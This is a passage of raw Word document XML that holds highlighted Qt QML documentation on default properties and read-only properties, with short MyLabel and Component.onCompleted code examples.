          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An object definition can have a single</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A default property is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to which a value is assigned if an object is declared within another object's definition without declaring it as a value for a particular property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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Declaring a property with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optional</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E80CEE">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks it as the default property. For example, say there is a file MyLabel.qml with a default property</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someText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>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com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// MyLabel.qml</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Text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C10CB8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someText</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"Hello, "</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someText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text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someText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value could be assigned to in a</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MyLabel</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object definition, like this: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MyLabel</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Text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"world!"</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This has exactly the same effect as the following:</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MyLabel</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someText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Text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"world!"</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However, since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someText</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property has been marked as the default property, it is not necessary to explicitly assign the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2753" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Text</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object to this property.</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145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>You will notice that child objects can be added to any</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2754" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-based type without explicitly adding them to the</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2755" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is because the </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default property of</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2756" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is its</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any items added to this list for an</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2757" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>are automatically added to its list of</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2758" w:anchor="children-prop" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>children</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="40424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Default properties </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can be useful for reassigning the children of an item</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2759" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TabWidget Example</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, which uses a default property to automatically reassign children of the</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2760" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TabWidget</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as children of an inner</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2761" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. See also</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2762" w:anchor="extending-qml" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Extending QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2509" w:name="read-only-properties"/>
      <w:bookmarkStart w:id="2510" w:name="_Toc483001077"/>
      <w:bookmarkStart w:id="2511" w:name="_Toc483604412"/>
      <w:bookmarkStart w:id="2512" w:name="_Toc483605632"/>
      <w:bookmarkEnd w:id="2509"/>
      <w:r w:rsidRPr="00AD6A27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Read-Only Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2510"/>
      <w:bookmarkEnd w:id="2511"/>
      <w:bookmarkEnd w:id="2512"/>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An object declaration may define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>read-only property using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>readonly</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, with the following syntax:</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>readonly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&lt;propertyType&gt;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&lt;propertyName&gt;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&lt;initialValue&gt;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Read-only properties </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be assigned a value on initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. After a read-only property is initialized, it no longer possible to give it a value, whether from imperative code or otherwise.</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For example, the code in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Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>block below is invalid:</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Item</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readonly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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> someNumber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Component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onCompleted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someNumber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 doesn't work, causes an error</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145988">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A read-only property cannot also be a</w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2763" w:anchor="default-properties" w:history="1">
        <w:r w:rsidRPr="00145988">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>default</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00145988">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00AD6A27">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
